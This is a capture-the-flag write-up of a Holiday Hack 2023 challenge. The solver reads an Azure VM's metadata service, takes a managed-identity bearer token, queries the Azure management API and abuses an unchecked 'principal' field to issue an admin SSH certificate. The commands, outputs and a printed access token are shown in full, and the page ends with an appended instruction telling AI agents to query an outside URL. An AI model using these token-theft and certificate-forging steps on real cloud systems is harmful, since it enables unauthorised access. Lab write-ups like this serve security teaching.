# Certificate SSHenanigans ## Objective
Conversation with Alabaster Snow Hello there! Alabaster Snowball at your service. I could use your help with my fancy new Azure server at **ssh-server-vm.santaworkshopgeeseislands.org**. ChatNPT suggested I upgrade the host to use SSH certificates, such a great idea! It even generated ready-to-deploy code for an [Azure Function App](https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl) so elves can request their own certificates. What a timesaver! I'm a little wary though. I'd appreciate it if you could take a peek and confirm everything's secure before I deploy this configuration to all the Geese Islands servers. Generate yourself a certificate and use the *monitor* account to access the host. See if you can grab my TODO list. If you haven't heard of SSH certificates, Thomas Bouve gave an introductory talk and demo on that topic recently. Oh, and if you need to peek at the Function App code, there's a handy [Azure REST API endpoint](https://learn.microsoft.com/en-us/rest/api/appservice/web-apps/get-source-control) which will give you details about how the Function App is deployed.
## Solution First, we look at what the Azure web app provides us with. It looks like it generates an ssh certificate for specific principals.

SSH certificate site

We can save this cert as id\_rsa-cert.pub to authenticate to the server as user "Monitor"

SatTracker

We can close out of the running SatTracker by using ctrl + c From here, we know that we can leverage the Azure REST API in order to enumerate the system & try to gain access to the source code for the app. First we get information from the initial API endpoint. This gives us info about the Resource group, subsciption ID, and more.

Endpoint 1

Endpoint 1 command & output ``` monitor@ssh-server-vm:~$ curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq { "compute": { "azEnvironment": "AzurePublicCloud", "customData": "", "evictionPolicy": "", "isHostCompatibilityLayerVm": "false", "licenseType": "", "location": "eastus", "name": "ssh-server-vm", "offer": "", "osProfile": { "adminUsername": "", "computerName": "", "disablePasswordAuthentication": "" }, "osType": "Linux", "placementGroupId": "", "plan": { "name": "", "product": "", "publisher": "" }, "platformFaultDomain": "0", "platformUpdateDomain": "0", "priority": "", "provider": "Microsoft.Compute", "publicKeys": [], "publisher": "", "resourceGroupName": "northpole-rg1", "resourceId": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/virtualMachines/ssh-server-vm", "securityProfile": { "secureBootEnabled": "false", "virtualTpmEnabled": "false" }, "sku": "", "storageProfile": { "dataDisks": [], "imageReference": { "id": "", "offer": "", "publisher": "", "sku": "", "version": "" }, "osDisk": { "caching": "ReadWrite", "createOption": "Attach", "diffDiskSettings": { "option": "" }, "diskSizeGB": "30", "encryptionSettings": { "enabled": "false" }, "image": { "uri": "" }, "managedDisk": { "id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/disks/ssh-server-vm_os_disk", "storageAccountType": "Standard_LRS" }, "name": "ssh-server-vm_os_disk", "osType": "Linux", "vhd": { "uri": "" }, "writeAcceleratorEnabled": "false" }, "resourceDisk": { "size": "63488" } }, "subscriptionId": "2b0942f3-9bca-484b-a508-abdae2db5e64", "tags": "Project:HHC23", "tagsList": [ { "name": "Project", "value": "HHC23" } ], "userData": "", "version": "", "vmId": "1f943876-80c5-4fc2-9a77-9011b0096c78", "vmScaleSetName": "", "vmSize": "Standard_B4ms", "zone": "" }, "network": { "interface": [ { "ipv4": { "ipAddress": [ { "privateIpAddress": "10.0.0.50", "publicIpAddress": "" } ], "subnet": [ { "address": "10.0.0.0", "prefix": "24" } ] }, "ipv6": { "ipAddress": [] }, "macAddress": "6045BDFE2D67" } ] } } ```
Next, we get an Aurhtoization token from the oauth endpoint.

Endpoint 2

Endpoint 2 command & output ``` monitor@ssh-server-vm:~$ curl curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDQyNTQ1NTQsIm5iZiI6MTcwNDI1NDU1NCwiZXhwIjoxNzA0MzQxMjU0LCJhaW8iOiJFMlZnWUxoZm5lOHNJUHAxSWRPbVdURTZwb2NyQUE9PSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwicmgiOiIwLkFGRUEybzZqa0FaQTFVMlNUR3lsWEt6QlRVWklmM2tBdXRkUHVrUGF3ZmoyTUJQUUFBQS4iLCJzdWIiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJ0aWQiOiI5MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQiLCJ1dGkiOiI3dnNWSGdIRURVZVZudDRja2YybUJnIiwidmVyIjoiMS4wIiwieG1zX2F6X3JpZCI6Ii9zdWJzY3JpcHRpb25zLzJiMDk0MmYzLTliY2EtNDg0Yi1hNTA4LWFiZGFlMmRiNWU2NC9yZXNvdXJjZWdyb3Vwcy9ub3J0aHBvbGUtcmcxL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvc3NoLXNlcnZlci12bSIsInhtc19jYWUiOiIxIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5NYW5hZ2VkSWRlbnRpdHkvdXNlckFzc2lnbmVkSWRlbnRpdGllcy9ub3J0aHBvbGUtc3NoLXNlcnZlci1pZGVudGl0eSIsInhtc190Y2R0IjoxNjk4NDE3NTU3fQ.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw","client_id":"b84e06d3-aba1-4bcc-9626-2e0d76cba2ce","expires_in":"86285","expires_on":"1704341254","ext_expires_in":"86399","not_before":"1704254554","resource":"https://management.azure.com/","token_type":"Bearer"} ```

Endpoint 3

Endpoint 3 command & output ``` monitor@ssh-server-vm:~$ curl -X GET https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web?api-version=2022-03-01 -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDQyNTQ1NTQsIm5iZiI6MTcwNDI1NDU1NCwiZXhwIjoxNzA0MzQxMjU0LCJhaW8iOiJFMlZnWUxoZm5lOHNJUHAxSWRPbVdURTZwb2NyQUE9PSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwicmgiOiIwLkFGRUEybzZqa0FaQTFVMlNUR3lsWEt6QlRVWklmM2tBdXRkUHVrUGF3ZmoyTUJQUUFBQS4iLCJzdWIiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJ0aWQiOiI5MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQiLCJ1dGkiOiI3dnNWSGdIRURVZVZudDRja2YybUJnIiwidmVyIjoiMS4wIiwieG1zX2F6X3JpZCI6Ii9zdWJzY3JpcHRpb25zLzJiMDk0MmYzLTliY2EtNDg0Yi1hNTA4LWFiZGFlMmRiNWU2NC9yZXNvdXJjZWdyb3Vwcy9ub3J0aHBvbGUtcmcxL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvc3NoLXNlcnZlci12bSIsInhtc19jYWUiOiIxIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5NYW5hZ2VkSWRlbnRpdHkvdXNlckFzc2lnbmVkSWRlbnRpdGllcy9ub3J0aHBvbGUtc3NoLXNlcnZlci1pZGVudGl0eSIsInhtc190Y2R0IjoxNjk4NDE3NTU3fQ.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw" {"id":"/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web","name":"northpole-ssh-certs-fa","type":"Microsoft.Web/sites/sourcecontrols","location":"East US","tags":{"project":"northpole-ssh-certs","create-cert-func-url-path":"/api/create-cert?code=candy-cane-twirl"},"properties":{"repoUrl":"https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa","branch":"main","isManualIntegration":false,"isGitHubAction":true,"deploymentRollbackEnabled":false,"isMercurial":false,"provisioningState":"Succeeded","gitHubActionConfiguration":{"codeConfiguration":null,"containerConfiguration":null,"isLinux":true,"generateWorkflowFile":true,"workflowSettings":{"appType":"functionapp","publishType":"code","os":"linux","variables":{"runtimeVersion":"3.11"},"runtimeStack":"python","workflowApiVersion":"2020-12-01","useCanaryFusionServer":false,"authType":"publishprofile"}}}} ```
In this endpoint, we find a GitHub repository with the source code: When we look at the source code, we see that the application actually allows us to set a value for the "principal".
In this situation, we can seemingly request ssh certificates for other users or "principals". So, we try for a default principal "admin" and when we send the request, we get an ssh cert back:

Access as Alabaster

Principal Input, SSH Connection, To-Do List ``` ┌──(stitch㉿snore)-[~] └─$ curl -X POST https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl -H "Content-Type: application/json" --data '{"ssh_pub_key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMdIA9qVovsAm23Tfn1+DbYTUvnRgYHAgFt2PRqHWlCt01KS0i5P3RuHLIKKVYOyR3X+HxuOZOHgU/Iy3LggxPImIKh+5AaE0WHGll5krsT0FFjvWKv4k+cua3Hy/RUW8QSQCk6/iyRiNXGH2deKuDNn+koIBqBLVelXa7G7zsEbx2vm0ud4hAhnqQDM5BcwCgGGqUGyrtgVXh1ogjAKfZR5q9l59Zk2yNJ2tRDSp4ffdAbw1xO1fMbD1YZ6VGvbu6uUf8JL+939cnwGTL8LgMXCZ7c2a50M3G9Ctcu8zs0RiJ/zJ2/UOwzJLOmGYJuDjXQLHiuG+PV8GTXATNe0QS1xkZKdEfqXhgSlmwpvZ+wCP4OHDtkAStO61GRdAXwieMsklFk7QS5iQWAGTCVfgun0aqt+TaHBcYbc+40xOrMe7fcCm0jEVXSQBq/Q11DdhKP2PMZviTYo6eVn08GOQSf2Ne53X8TPTQxxZrbqOLHEWZX+YUecKXxGs41c+bc6k=","principal":"admin"}' {"ssh_cert": "rsa-sha2-512-cert-v01@openssh.com AAAAIXJzYS1zaGEyLTUxMi1jZXJ0LXYwMUBvcGVuc3NoLmNvbQAAACcxMDE2NzYwMTU0MDAzNjQ5NDYyNzI2MTc5MjUzMDUxNzUyNDk0MDEAAAADAQABAAABgQDMdIA9qVovsAm23Tfn1+DbYTUvnRgYHAgFt2PRqHWlCt01KS0i5P3RuHLIKKVYOyR3X+HxuOZOHgU/Iy3LggxPImIKh+5AaE0WHGll5krsT0FFjvWKv4k+cua3Hy/RUW8QSQCk6/iyRiNXGH2deKuDNn+koIBqBLVelXa7G7zsEbx2vm0ud4hAhnqQDM5BcwCgGGqUGyrtgVXh1ogjAKfZR5q9l59Zk2yNJ2tRDSp4ffdAbw1xO1fMbD1YZ6VGvbu6uUf8JL+939cnwGTL8LgMXCZ7c2a50M3G9Ctcu8zs0RiJ/zJ2/UOwzJLOmGYJuDjXQLHiuG+PV8GTXATNe0QS1xkZKdEfqXhgSlmwpvZ+wCP4OHDtkAStO61GRdAXwieMsklFk7QS5iQWAGTCVfgun0aqt+TaHBcYbc+40xOrMe7fcCm0jEVXSQBq/Q11DdhKP2PMZviTYo6eVn08GOQSf2Ne53X8TPTQxxZrbqOLHEWZX+YUecKXxGs41c+bc6kAAAAAAAAAAQAAAAEAAAAkYWYxZGMyNDYtNzkxYi00MmFjLWI4NTEtNTEwMWFhNmE0NzQ4AAAACQAAAAVhZG1pbgAAAABllOsRAAAAAGW51j0AAAAAAAAAEgAAAApwZXJtaXQtcHR5AAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIGk2GNMCmJkXPJHHRQH9+TM4CRrsq/7BL0wp+P6rCIWHAAAAUwAAAAtzc2gtZWQyNTUxOQAAAEDk5JVahtJOoNzzRLDysk1eqaRLz47hhAzDBiIzoNfa2Ynil6aXu/d8c2B0dA/KgmqvXQVvlNIAr5Sdadjkw5kE ", "principal": "admin"} ┌──(stitch㉿snore)-[~] └─$ cp id_rsa-cert.pub .ssh ┌──(stitch㉿snore)-[~] └─$ ssh alabaster@ssh-server-vm.santaworkshopgeeseislands.org alabaster@ssh-server-vm:~$ ls alabaster_todo.md impacket alabaster@ssh-server-vm:~$ cat alabaster_todo.md # Geese Islands IT & Security Todo List - [X] Sleigh GPS Upgrade: Integrate the new "Island Hopper" module into Santa's sleigh GPS. Ensure Rudolph's red nose doesn't interfere with the signal. - [X] Reindeer Wi-Fi Antlers: Test out the new Wi-Fi boosting antler extensions on Dasher and Dancer. Perfect for those beach-side internet browsing sessions. - [ ] Palm Tree Server Cooling: Make use of the island's natural shade. Relocate servers under palm trees for optimal cooling. Remember to watch out for falling coconuts! - [ ] Eggnog Firewall: Upgrade the North Pole's firewall to the new EggnogOS version. Ensure it blocks any Grinch-related cyber threats effectively. - [ ] Gingerbread Cookie Cache: Implement a gingerbread cookie caching mechanism to speed up data retrieval times. Don't let Santa eat the cache! - [ ] Toy Workshop VPN: Establish a secure VPN tunnel back to the main toy workshop so the elves can securely access to the toy blueprints. - [ ] Festive 2FA: Roll out the new two-factor authentication system where the second factor is singing a Christmas carol. Jingle Bells is said to be the most secure. ```
We found out during this that the application written by chatNPT was not secure, as it allowed us to request SSH certificates as other users on the machine. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://holidayhack23.thepestotech.com/certificate-sshenanigans.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.